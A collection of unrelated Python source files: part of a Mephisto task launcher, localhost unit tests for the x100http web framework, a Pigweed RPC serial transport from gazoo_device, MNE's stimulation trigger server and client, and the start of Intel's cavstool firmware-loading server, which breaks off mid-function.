assignment.write_assignment_data(data)
self.assignments.append(assignment)
evaluation_unit = self.UnitClass.new(
self.db, assignment, unit_type_index, task_args.task_reward
)
evaluation_unit.launch(self.launch_url)
return evaluation_unit
def launch_screening_unit(self, unit_data: Dict[str, Any]) -> "Unit":
"""Launch a screening unit, which should never return to the pool"""
return self.launch_evaluation_unit(unit_data, SCREENING_UNIT_INDEX)
def launch_gold_unit(self, unit_data: Dict[str, Any]) -> "Unit":
"""Launch a screening unit, which should never return to the pool"""
return self.launch_evaluation_unit(unit_data, GOLD_UNIT_INDEX)
def get_assignments_are_all_created(self) -> bool:
return self.assignment_thread_done
def expire_units(self) -> None:
"""Clean up all units on this TaskLauncher"""
self.keep_launching_units = False
self.finished_generators = True
for unit in tqdm(self.units):
try:
unit.expire()
except Exception as e:
logger.exception(
f"Warning: failed to expire unit {unit.db_id}. Stated error: {e}",
exc_info=True,
)
def shutdown(self) -> None:
"""Clean up running threads for generating assignments and units"""
self.assignment_thread_done = True
self.keep_launching_units = False
self.finished_generators = True
if self.assignments_thread is not None:
self.assignments_thread.join()
if self.units_thread is not None:
self.units_thread.join()
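# Illustrative sketch (not Mephisto API) of the bounded-launch pattern that
# generate_units()/_launch_limited_units() implement above: keep at most
# `max_concurrent` items in flight and refill as launched items finish.
# All names below are illustrative.
def bounded_launch(pending, launch, is_done, max_concurrent, poll_seconds=0.5):
    """Launch items from the `pending` dict without exceeding `max_concurrent`
    in flight; `is_done(item)` reports completion."""
    in_flight = {}
    while pending or in_flight:
        # retire items that have finished
        for item_id in [i for i, item in in_flight.items() if is_done(item)]:
            in_flight.pop(item_id)
        # refill up to the concurrency budget
        budget = max_concurrent - len(in_flight)
        for item_id in list(pending)[: max(budget, 0)]:
            item = pending.pop(item_id)
            in_flight[item_id] = item
            launch(item)
        time.sleep(poll_seconds)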
|
tests.py
|
import unittest
import time
import urllib.request
from multiprocessing import Process
from x100http import X100HTTP, X100Response
import requests
class UploadHandler:
def upload_start(self, req):
self.content = "start"
def upload_process(self, key, line):
self.content += line.decode()
def upload_finish(self, req):
return "upload succ, content = " + self.content
def get_simple(req):
remote_ip = req.get_remote_ip()
response = "<html><body>hello, " + remote_ip + "</body></html>"
return response
def get_via_class(req):
remote_ip = req.get_remote_ip()
response = X100Response()
response.set_body("<html><body>hello, " + remote_ip + "</body></html>")
return response
def get_via_class_directly(req):
remote_ip = req.get_remote_ip()
response = X100Response()
response.body = (
"<html><body>hello, " + remote_ip + "</body></html>").encode()
return response
def get_args(req):
myval = req.get_arg("myget_key")
return "hello" + myval
def get_query_string(req):
return "hello" + req.get_query_string()
def get_custom_header(req):
remote_ip = req.get_remote_ip()
response = X100Response()
response.set_header("X-My-Header", "My-Value")
response.set_body("<html><body>hello, " + remote_ip + "</body></html>")
return response
def get_custom_header_directly(req):
remote_ip = req.get_remote_ip()
response = X100Response()
response.headers["X-My-Header"] = "My-Value"
response.body = (
"<html><body>hello, " + remote_ip + "</body></html>").encode()
return response
def post_simple(req):
return "hello, world!" + req.get_body()
def post_urlencode(req):
return "hello, world!" + req.get_arg('mykey')
def regex_get(req):
arg_first = req.get_arg("arg_first")
arg_second = req.get_arg("arg_second")
return "regex_get: " + arg_first + ", " + arg_second
def regex_get_in_url(req):
arg_first = req.get_arg_in_url("arg_first")
arg_second = req.get_arg_in_url("arg_second")
return "regex_get: " + arg_first + ", " + arg_second
def regex_get_more_arg(req):
arg_first = req.get_arg("arg_first")
arg_second = req.get_arg("abc")
return "regex_get: " + arg_first + ", " + arg_second
class TestSimple(unittest.TestCase):
@classmethod
def setUpClass(ConnectionHolder):
app = X100HTTP()
app.get("/", get_simple)
app.get("/get_via_class", get_via_class)
app.get("/get_via_class_directly", get_via_class_directly)
app.get("/get_args", get_args)
app.get("/get_query_string", get_query_string)
app.get("/get_custom_header", get_custom_header)
app.get("/get_custom_header_directly", get_custom_header_directly)
app.post("/post_simple", post_simple)
app.post("/post_urlencode", post_urlencode)
app.upload("/upload_simple", UploadHandler)
app.get("/one_dir/<arg_first>_<arg_second>.py", regex_get)
app.get("/<arg_first>_<arg_second>.py", regex_get_in_url)
app.get("/one_dir/<arg_first>.py", regex_get_more_arg)
app.static("/static/test/", "tests/sta/")
ConnectionHolder.p = Process(target=app.run, args=('127.0.0.1', 8080))
ConnectionHolder.p.start()
@classmethod
def tearDownClass(ConnectionHolder):
ConnectionHolder.p.terminate()
def test_static(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/tests/test.html', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.info().get('Content-Type'), 'text/html')
self.assertEqual(f.read().decode(), "this is test.html\n")
def test_static_simple(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/static/test/static_test.html', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.info().get('Content-Type'), 'text/html')
self.assertEqual(f.read().decode(), "this is test for static html\n")
def test_get_root(self):
req = urllib.request.Request(url='http://127.0.0.1:8080', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_root_slash(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_via_class(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_via_class', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_via_class_directly(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_via_class_directly', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_args(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_args?myget_key=myget_value', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.read().decode(), "hellomyget_value")
def test_get_query_string(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_query_string?myget_key=myget_value', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.read().decode(), "hellomyget_key=myget_value")
def test_get_custom_header(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_custom_header', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.info().get('X-My-Header'), 'My-Value')
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_custom_header_directly(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_custom_header_directly', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.info().get('X-My-Header'), 'My-Value')
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_post_simple(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/post_simple', data=b'data', method='POST')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.read().decode(), "hello, world!data")
def test_post_urlencode(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/post_urlencode', data=b'mykey=myvalue', method='POST')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.read().decode(), "hello, world!myvalue")
def test_upload_simple(self):
f = open('tests/test.html', 'rb')
r = requests.post(
'http://127.0.0.1:8080/upload_simple', files={'file': f})
f.close()
self.assertEqual(r.status_code, 200)
self.assertEqual(
r.text, "upload succ, content = startthis is test.html\n\r\n")
def test_regex_get(self):
resp = requests.get('http://127.0.0.1:8080/one_dir/hello_x100http.py')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.text, "regex_get: hello, x100http")
def test_regex_get_404(self):
resp = requests.get('http://127.0.0.1:8080/one_dir/hello_x100http.pl')
self.assertEqual(resp.status_code, 404)
def test_regex_get_in_url(self):
resp = requests.get('http://127.0.0.1:8080/hello_x100http.py')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.text, "regex_get: hello, x100http")
def test_regex_get_more_arg(self):
resp = requests.get('http://127.0.0.1:8080/one_dir/hello.py?abc=def')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.text, "regex_get: hello, def")
if __name__ == '__main__':
unittest.main()
|
pigweed_rpc_transport.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pigweed RPC transport class."""
import fcntl
import queue
import select
import threading
import types
from typing import Any, Collection, Dict, Optional, Tuple
from gazoo_device import errors
from gazoo_device import gdm_logger
from gazoo_device.switchboard.transports import transport_base
import serial
# TODO(b/181734752): Remove conditional imports of Pigweed
try:
# pylint: disable=g-import-not-at-top
# pytype: disable=import-error
import pw_rpc
from pw_rpc import callback_client
from pw_hdlc import rpc
from pw_hdlc import decode
from pw_protobuf_compiler import python_protos
# pytype: enable=import-error
PIGWEED_IMPORT = True
except ImportError:
pw_rpc = None
callback_client = None
rpc = None
decode = None
python_protos = None
PIGWEED_IMPORT = False
_STDOUT_ADDRESS = 1
_DEFAULT_ADDRESS = ord("R")
_JOIN_TIMEOUT_SEC = 1 # seconds
_SELECT_TIMEOUT_SEC = 0.1 # seconds
logger = gdm_logger.get_logger()
class PwHdlcRpcClient:
"""Pigweed HDLC RPC Client.
Adapted from https://pigweed.googlesource.com/pigweed/pigweed/+/refs/heads/master/pw_hdlc/py/pw_hdlc/rpc.py. # pylint: disable=line-too-long
"""
def __init__(self,
serial_instance: serial.Serial,
protobufs: Collection[types.ModuleType]):
"""Creates an RPC client configured to communicate using HDLC.
Args:
serial_instance: Serial interface instance.
protobufs: Proto modules.
"""
if not PIGWEED_IMPORT:
raise errors.DependencyUnavailableError(
"Pigweed python packages are not available in this environment.")
protos = python_protos.Library.from_paths(protobufs)
client_impl = callback_client.Impl()
channels = rpc.default_channels(serial_instance.write)
self._client = pw_rpc.Client.from_modules(client_impl,
channels,
protos.modules())
self._serial = serial_instance
self._stop_event = threading.Event()
self._worker = None
self.log_queue = queue.Queue()
def is_alive(self) -> bool:
"""Returns true if the worker thread has started."""
return self._worker is not None and self._worker.is_alive()
def start(self) -> None:
"""Creates and starts the worker thread if it hasn't been created."""
if self._stop_event.is_set():
self._stop_event.clear()
if self._worker is None:
self._worker = threading.Thread(target=self.read_and_process_data)
self._worker.start()
def close(self) -> None:
"""Sets the threading event and joins the worker thread."""
self._stop_event.set()
if self._worker is not None:
self._worker.join(timeout=_JOIN_TIMEOUT_SEC)
if self._worker.is_alive():
raise errors.DeviceError(
f"The child thread failed to join after {_JOIN_TIMEOUT_SEC} seconds"
)
self._worker = None
def rpcs(self, channel_id: Optional[int] = None) -> Any:
"""Returns object for accessing services on the specified channel.
Args:
channel_id: None or RPC channel id.
Returns:
RPC instance over the specified channel.
"""
if channel_id is None:
return next(iter(self._client.channels())).rpcs
return self._client.channel(channel_id).rpcs
def read_and_process_data(self) -> None:
"""Continuously reads and handles HDLC frames."""
decoder = decode.FrameDecoder()
while not self._stop_event.is_set():
readfds, _, _ = select.select([self._serial], [], [], _SELECT_TIMEOUT_SEC)
for fd in readfds:
try:
data = fd.read()
except Exception: # pylint: disable=broad-except
logger.exception(
"Exception occurred when reading in PwHdlcRpcClient thread.")
data = None
if data:
for frame in decoder.process_valid_frames(data):
self._handle_frame(frame)
def _handle_rpc_packet(self, frame: Any) -> None:
"""Handler for processing HDLC frame.
Args:
frame: HDLC frame packet.
"""
if not self._client.process_packet(frame.data):
logger.error(f"Packet not handled by RPC client: {frame.data}")
def _push_to_log_queue(self, frame: Any) -> None:
"""Pushes the HDLC log in frame into the log queue.
Args:
frame: HDLC frame packet.
"""
self.log_queue.put(frame.data + b"\n")
def _handle_frame(self, frame: Any) -> None:
"""Private method for processing HDLC frame.
Args:
frame: HDLC frame packet.
"""
try:
if not frame.ok():
return
if frame.address == _DEFAULT_ADDRESS:
self._handle_rpc_packet(frame)
elif frame.address == _STDOUT_ADDRESS:
self._push_to_log_queue(frame)
else:
logger.warning(f"Unhandled frame for address {frame.address}: {frame}")
except Exception: # pylint: disable=broad-except
logger.exception("Exception occurred in PwHdlcRpcClient.")
class PigweedRPCTransport(transport_base.TransportBase):
"""Performs transport communication using the Pigweed RPC to end devices."""
def __init__(self,
comms_address: str,
protobufs: Collection[types.ModuleType],
baudrate: int,
auto_reopen: bool = True,
open_on_start: bool = True):
super().__init__(
auto_reopen=auto_reopen,
open_on_start=open_on_start)
self.comms_address = comms_address
self._protobufs = protobufs
self._serial = serial.Serial()
self._serial.port = comms_address
self._serial.baudrate = baudrate
self._serial.timeout = 0.01
self._hdlc_client = PwHdlcRpcClient(self._serial, protobufs)
def is_open(self) -> bool:
"""Returns True if the PwRPC transport is connected to the target.
Returns:
True if transport is open, False otherwise.
"""
return self._serial.isOpen() and self._hdlc_client.is_alive()
def _close(self) -> None:
"""Closes the PwRPC transport."""
self._hdlc_client.close()
fcntl.flock(self._serial.fileno(), fcntl.LOCK_UN)
self._serial.close()
def _open(self) -> None:
"""Opens the PwRPC transport."""
self._serial.open()
fd = self._serial.fileno()
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
self._hdlc_client.start()
def _read(self, size: int, timeout: float) -> bytes:
"""Returns Pigweed log from the HDLC channel 1.
Args:
size: Not used.
timeout: Maximum seconds to wait to read bytes.
Returns:
bytes read from transport or None if no bytes were read
"""
# Retrieving logs from queue doesn't support size configuration.
del size
try:
return self._hdlc_client.log_queue.get(timeout=timeout)
except queue.Empty:
return b""
def _write(self, data: str, timeout: Optional[float] = None) -> int:
"""Dummy method for Pigweed RPC.
Declared to pass the inheritance check of TransportBase.
Args:
data: Not used.
timeout: Not used.
Returns:
int: Not used.
"""
return 0
def rpc(self,
service_name: str,
event_name: str,
**kwargs: Dict[str, Any]) -> Tuple[bool, bytes]:
"""RPC call to the Matter endpoint with given service and event name.
Args:
service_name: PwRPC service name.
event_name: Event name in the given service instance.
**kwargs: Arguments for the event method.
Returns:
(RPC ack value, RPC encoded payload in bytes)
"""
client_channel = self._hdlc_client.rpcs().chip.rpc
service = getattr(client_channel, service_name)
event = getattr(service, event_name)
ack, payload = event(**kwargs)
return ack.ok(), payload.SerializeToString()
def echo_rpc(self, msg: str) -> Tuple[bool, str]:
"""Calls the Echo RPC endpoint.
Sends a message to the echo endpoint and returns the response back. Uses a
different namespace (pw.rpc) than the rest of Matter endpoints (chip.rpc).
Only used by the Pigweed Echo example app:
https://github.com/project-chip/connectedhomeip/tree/master/examples/pigweed-app/esp32#chip-esp32-pigweed-example-application
Args:
msg: Echo message to send.
Returns:
(RPC ack value, Echo message)
"""
client_channel = self._hdlc_client.rpcs().pw.rpc
echo_service = client_channel.EchoService
ack, payload = echo_service.Echo(msg=msg)
return ack.ok(), payload.msg
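# Illustrative usage sketch. The serial path, baud rate and empty protobuf
# collection below are placeholders, and _open()/_close() are called directly
# because the public open/close surface lives in transport_base.TransportBase
# (not shown here). Only rpc() and echo_rpc() are defined in this module.
def example_echo(port="/dev/ttyUSB0", protobufs=(), baudrate=115200):
    transport = PigweedRPCTransport(port, protobufs, baudrate)
    transport._open()
    try:
        ack, reply = transport.echo_rpc("hello")  # pw.rpc EchoService.Echo
        return ack, reply
    finally:
        transport._close()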
|
stim_server_client.py
|
# Author: Mainak Jas <mainak@neuro.hut.fi>
# License: BSD (3-clause)
import queue
import time
import socket
import socketserver
import threading
import numpy as np
from ..utils import logger, verbose
class _ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""Create a threaded TCP server.
Parameters
----------
server_address : str
Address on which server is listening
request_handler_class : subclass of BaseRequestHandler
_TriggerHandler which defines the handle method
stim_server : instance of StimServer
object of StimServer class
"""
def __init__(self, server_address, request_handler_class,
stim_server): # noqa: D102
# Basically, this server is the same as a normal TCPServer class
# except that it has an additional attribute stim_server
# Create the server and bind it to the desired server address
socketserver.TCPServer.__init__(self, server_address,
request_handler_class,
False)
self.stim_server = stim_server
class _TriggerHandler(socketserver.BaseRequestHandler):
"""Request handler on the server side."""
def handle(self):
"""Handle requests on the server side."""
self.request.settimeout(None)
while self.server.stim_server._running:
data = self.request.recv(1024) # clip input at 1Kb
data = data.decode() # need to turn it into a string (Py3k)
if data == 'add client':
# Add stim_server._client
client_id = self.server.stim_server \
._add_client(self.client_address[0],
self)
# Instantiate queue for communication between threads
# Note: new queue for each handler
if not hasattr(self, '_tx_queue'):
self._tx_queue = queue.Queue()
self.request.sendall("Client added".encode('utf-8'))
# Mark the client as running
for client in self.server.stim_server._clients:
if client['id'] == client_id:
client['running'] = True
elif data == 'get trigger':
# Pop triggers and send them
if (self._tx_queue.qsize() > 0 and
hasattr(self.server.stim_server, '_clients')):
trigger = self._tx_queue.get()
self.request.sendall(str(trigger).encode('utf-8'))
else:
self.request.sendall("Empty".encode('utf-8'))
class StimServer(object):
"""Stimulation Server.
Server to communicate with StimClient(s).
Parameters
----------
port : int
The port to which the stimulation server must bind to.
n_clients : int
The number of clients which will connect to the server.
See Also
--------
StimClient
"""
def __init__(self, port=4218, n_clients=1): # noqa: D102
# Start a threaded TCP server, binding to localhost on specified port
self._data = _ThreadedTCPServer(('', port),
_TriggerHandler, self)
self.n_clients = n_clients
def __enter__(self): # noqa: D105
# This is done to avoid "[Errno 98] Address already in use"
self._data.allow_reuse_address = True
self._data.server_bind()
self._data.server_activate()
# Start a thread for the server
self._thread = threading.Thread(target=self._data.serve_forever)
# Ctrl-C will cleanly kill all spawned threads
# Once the main thread exits, other threads will exit
self._thread.daemon = True
self._thread.start()
self._running = False
self._clients = list()
return self
def __exit__(self, type, value, traceback): # noqa: D105
self.shutdown()
@verbose
def start(self, timeout=np.inf, verbose=None):
"""Start the server.
Parameters
----------
timeout : float
Maximum time to wait for clients to be added.
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
"""
# Start server
if not self._running:
logger.info('RtServer: Start')
self._running = True
start_time = time.time() # init delay counter.
# wait till n_clients are added
while (len(self._clients) < self.n_clients):
current_time = time.time()
if (current_time > start_time + timeout):
raise StopIteration
time.sleep(0.1)
@verbose
def _add_client(self, ip, sock, verbose=None):
"""Add client.
Parameters
----------
ip : str
IP address of the client.
sock : instance of socket.socket
The client socket.
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
"""
logger.info("Adding client with ip = %s" % ip)
client = dict(ip=ip, id=len(self._clients), running=False, socket=sock)
self._clients.append(client)
return client['id']
@verbose
def shutdown(self, verbose=None):
"""Shutdown the client and server.
Parameters
----------
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
"""
logger.info("Shutting down ...")
# stop running all the clients
if hasattr(self, '_clients'):
for client in self._clients:
client['running'] = False
self._running = False
self._data.shutdown()
self._data.server_close()
self._data.socket.close()
@verbose
def add_trigger(self, trigger, verbose=None):
"""Add a trigger.
Parameters
----------
trigger : int
The trigger to be added to the queue for sending to StimClient.
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
See Also
--------
StimClient.get_trigger
"""
for client in self._clients:
client_id = client['id']
logger.info("Sending trigger %d to client %d"
% (trigger, client_id))
client['socket']._tx_queue.put(trigger)
class StimClient(object):
"""Stimulation Client.
Client to communicate with StimServer
Parameters
----------
host : str
Hostname (or IP address) of the host where StimServer is running.
port : int
Port to use for the connection.
timeout : float
Communication timeout in seconds.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
See Also
--------
StimServer
"""
@verbose
def __init__(self, host, port=4218, timeout=5.0,
verbose=None): # noqa: D102
try:
logger.info("Setting up client socket")
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(timeout)
self._sock.connect((host, port))
logger.info("Establishing connection with server")
data = "add client".encode('utf-8')
n_sent = self._sock.send(data)
if n_sent != len(data):
raise RuntimeError('Could not communicate with server')
resp = self._sock.recv(1024).decode() # turn bytes into str (Py3k)
if resp == 'Client added':
logger.info("Connection established")
else:
raise RuntimeError('Client not added')
except Exception:
raise RuntimeError('Setting up acquisition <-> stimulation '
'computer connection (host: %s '
'port: %d) failed. Make sure StimServer '
'is running.' % (host, port))
def close(self):
"""Close the socket object."""
self._sock.close()
@verbose
def get_trigger(self, timeout=5.0, verbose=None):
"""Get triggers from StimServer.
Parameters
----------
timeout : float
maximum time to wait for a valid trigger from the server
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
See Also
--------
StimServer.add_trigger
"""
start_time = time.time() # init delay counter. Will stop iterations
while True:
try:
current_time = time.time()
# Raise timeout error
if current_time > (start_time + timeout):
logger.info("received nothing")
return None
self._sock.send("get trigger".encode('utf-8'))
                trigger = self._sock.recv(1024).decode()
                if trigger != 'Empty':
logger.info("received trigger %s" % str(trigger))
return int(trigger)
except RuntimeError as err:
logger.info('Cannot receive triggers: %s' % (err))
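# Hedged usage sketch (not part of the module above): how StimServer and
# StimClient are meant to pair up, based solely on the API defined here. The
# host name and trigger value are placeholders.
#
#   # On the stimulation machine:
#   with StimServer(port=4218, n_clients=1) as server:
#       server.start(timeout=30.0)   # blocks until one client has connected
#       server.add_trigger(5)        # queue trigger 5 for every connected client
#
#   # On the acquisition machine:
#   client = StimClient('stim-host', port=4218)
#   trigger = client.get_trigger(timeout=5.0)  # returns 5, or None on timeout
#   client.close()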
|
cavstool_server.py
|
#!/usr/bin/env python3
# Copyright(c) 2022 Intel Corporation. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
import os
import sys
import struct
import logging
import asyncio
import time
import subprocess
import ctypes
import mmap
import argparse
import socketserver
import threading
import netifaces
# Global variable used to sync between the log and request services.
# When it is true, the adsp is able to start running.
start_output = False
lock = threading.Lock()
HOST = None
PORT_LOG = 9999
PORT_REQ = PORT_LOG + 1
BUF_SIZE = 4096
CMD_LOG_START = "start_log"
CMD_LOG_STOP = "stop_log"
CMD_DOWNLOAD = "download"
logging.basicConfig()
log = logging.getLogger("cavs-fw")
log.setLevel(logging.INFO)
PAGESZ = 4096
HUGEPAGESZ = 2 * 1024 * 1024
HUGEPAGE_FILE = "/dev/hugepages/cavs-fw-dma.tmp."
# SRAM windows. Each appears in a 128k region starting at 512k.
#
# Window 0 is the FW_STATUS area, and 4k after that the IPC "outbox"
# Window 1 is the IPC "inbox" (host-writable memory, just 384 bytes currently)
# Window 2 is unused by this script
# Window 3 is winstream-formatted log output
OUTBOX_OFFSET = (512 + (0 * 128)) * 1024 + 4096
INBOX_OFFSET = (512 + (1 * 128)) * 1024
WINSTREAM_OFFSET = (512 + (3 * 128)) * 1024
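# For reference, the resulting byte offsets into BAR4 are OUTBOX 0x81000,
# INBOX 0xa0000, and WINSTREAM 0xe0000.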
class HDAStream:
    # Creates an HDA stream with 2 buffers of buf_len each.
def __init__(self, stream_id: int):
self.stream_id = stream_id
self.base = hdamem + 0x0080 + (stream_id * 0x20)
log.info(f"Mapping registers for hda stream {self.stream_id} at base {self.base:x}")
self.hda = Regs(hdamem)
self.hda.GCAP = 0x0000
self.hda.GCTL = 0x0008
self.hda.DPLBASE = 0x0070
self.hda.DPUBASE = 0x0074
self.hda.SPBFCH = 0x0700
self.hda.SPBFCTL = 0x0704
self.hda.PPCH = 0x0800
self.hda.PPCTL = 0x0804
self.hda.PPSTS = 0x0808
self.hda.SPIB = 0x0708 + stream_id*0x08
self.hda.freeze()
self.regs = Regs(self.base)
self.regs.CTL = 0x00
self.regs.STS = 0x03
self.regs.LPIB = 0x04
self.regs.CBL = 0x08
self.regs.LVI = 0x0c
self.regs.FIFOW = 0x0e
self.regs.FIFOS = 0x10
self.regs.FMT = 0x12
self.regs.FIFOL= 0x14
self.regs.BDPL = 0x18
self.regs.BDPU = 0x1c
self.regs.freeze()
self.dbg0 = Regs(hdamem + 0x0084 + (0x20*stream_id))
self.dbg0.DPIB = 0x00
self.dbg0.EFIFOS = 0x10
self.dbg0.freeze()
self.reset()
def __del__(self):
self.reset()
def config(self, buf_len: int):
log.info(f"Configuring stream {self.stream_id}")
self.buf_len = buf_len
log.info("Allocating huge page and setting up buffers")
self.mem, self.hugef, self.buf_list_addr, self.pos_buf_addr, self.n_bufs = self.setup_buf(buf_len)
log.info("Setting buffer list, length, and stream id and traffic priority bit")
self.regs.CTL = ((self.stream_id & 0xFF) << 20) | (1 << 18) # must be set to something other than 0?
self.regs.BDPU = (self.buf_list_addr >> 32) & 0xffffffff
self.regs.BDPL = self.buf_list_addr & 0xffffffff
self.regs.CBL = buf_len
self.regs.LVI = self.n_bufs - 1
self.debug()
log.info(f"Configured stream {self.stream_id}")
def write(self, data):
bufl = min(len(data), self.buf_len)
log.info(f"Writing data to stream {self.stream_id}, len {bufl}, SPBFCTL {self.hda.SPBFCTL:x}, SPIB {self.hda.SPIB}")
self.mem[0:bufl] = data[0:bufl]
self.mem[bufl:bufl+bufl] = data[0:bufl]
self.hda.SPBFCTL |= (1 << self.stream_id)
self.hda.SPIB += bufl
log.info(f"Wrote data to stream {self.stream_id}, SPBFCTL {self.hda.SPBFCTL:x}, SPIB {self.hda.SPIB}")
def start(self):
log.info(f"Starting stream {self.stream_id}, CTL {self.regs.CTL:x}")
self.regs.CTL |= 2
log.info(f"Started stream {self.stream_id}, CTL {self.regs.CTL:x}")
def stop(self):
log.info(f"Stopping stream {self.stream_id}, CTL {self.regs.CTL:x}")
self.regs.CTL &= 2
time.sleep(0.1)
self.regs.CTL |= 1
log.info(f"Stopped stream {self.stream_id}, CTL {self.regs.CTL:x}")
def setup_buf(self, buf_len: int):
(mem, phys_addr, hugef) = map_phys_mem(self.stream_id)
log.info(f"Mapped 2M huge page at 0x{phys_addr:x} for buf size ({buf_len})")
# create two buffers in the page of buf_len and mark them
# in a buffer descriptor list for the hardware to use
buf0_len = buf_len
buf1_len = buf_len
bdl_off = buf0_len + buf1_len
        # each BDL entry is 16 bytes (packed here as two 64-bit words); we have two entries
mem[bdl_off:bdl_off + 32] = struct.pack("<QQQQ",
phys_addr,
buf0_len,
phys_addr + buf0_len,
buf1_len)
dpib_off = bdl_off+32
# ensure buffer is initialized, sanity
for i in range(0, buf_len*2):
mem[i] = 0
log.info("Filled the buffer descriptor list (BDL) for DMA.")
return (mem, hugef, phys_addr + bdl_off, phys_addr+dpib_off, 2)
def debug(self):
log.info("HDA %d: PPROC %d, CTL 0x%x, LPIB 0x%x, BDPU 0x%x, BDPL 0x%x, CBL 0x%x, LVI 0x%x",
self.stream_id, (hda.PPCTL >> self.stream_id) & 1, self.regs.CTL, self.regs.LPIB, self.regs.BDPU,
self.regs.BDPL, self.regs.CBL, self.regs.LVI)
log.info(" FIFOW %d, FIFOS %d, FMT %x, FIFOL %d, DPIB %d, EFIFOS %d",
self.regs.FIFOW & 0x7, self.regs.FIFOS, self.regs.FMT, self.regs.FIFOL, self.dbg0.DPIB, self.dbg0.EFIFOS)
log.info(" status: FIFORDY %d, DESE %d, FIFOE %d, BCIS %d",
(self.regs.STS >> 5) & 1, (self.regs.STS >> 4) & 1, (self.regs.STS >> 3) & 1, (self.regs.STS >> 2) & 1)
def reset(self):
# Turn DMA off and reset the stream. Clearing START first is a
# noop per the spec, but absolutely required for stability.
# Apparently the reset doesn't stop the stream, and the next load
# starts before it's ready and kills the load (and often the DSP).
# The sleep too is required, on at least one board (a fast
# chromebook) putting the two writes next each other also hangs
# the DSP!
log.info(f"Resetting stream {self.stream_id}")
self.debug()
self.regs.CTL &= ~2 # clear START
time.sleep(0.1)
# set enter reset bit
self.regs.CTL = 1
while (self.regs.CTL & 1) == 0: pass
# clear enter reset bit to exit reset
self.regs.CTL = 0
while (self.regs.CTL & 1) == 1: pass
log.info(f"Disable SPIB and set position 0 of stream {self.stream_id}")
self.hda.SPBFCTL = 0
self.hda.SPIB = 0
#log.info("Setting dma position buffer and enable it")
#self.hda.DPUBASE = self.pos_buf_addr >> 32 & 0xffffffff
#self.hda.DPLBASE = self.pos_buf_addr & 0xfffffff0 | 1
log.info(f"Enabling dsp capture (PROCEN) of stream {self.stream_id}")
self.hda.PPCTL |= (1 << self.stream_id)
self.debug()
log.info(f"Reset stream {self.stream_id}")
def map_regs():
p = runx(f"grep -iPl 'PCI_CLASS=40(10|38)0' /sys/bus/pci/devices/*/uevent")
pcidir = os.path.dirname(p)
# Platform/quirk detection. ID lists cribbed from the SOF kernel driver
global cavs15, cavs18, cavs25
did = int(open(f"{pcidir}/device").read().rstrip(), 16)
cavs15 = did in [ 0x5a98, 0x1a98, 0x3198 ]
cavs18 = did in [ 0x9dc8, 0xa348, 0x02c8, 0x06c8, 0xa3f0 ]
cavs25 = did in [ 0xa0c8, 0x43c8, 0x4b55, 0x4b58, 0x7ad0, 0x51c8 ]
# Check sysfs for a loaded driver and remove it
if os.path.exists(f"{pcidir}/driver"):
mod = os.path.basename(os.readlink(f"{pcidir}/driver/module"))
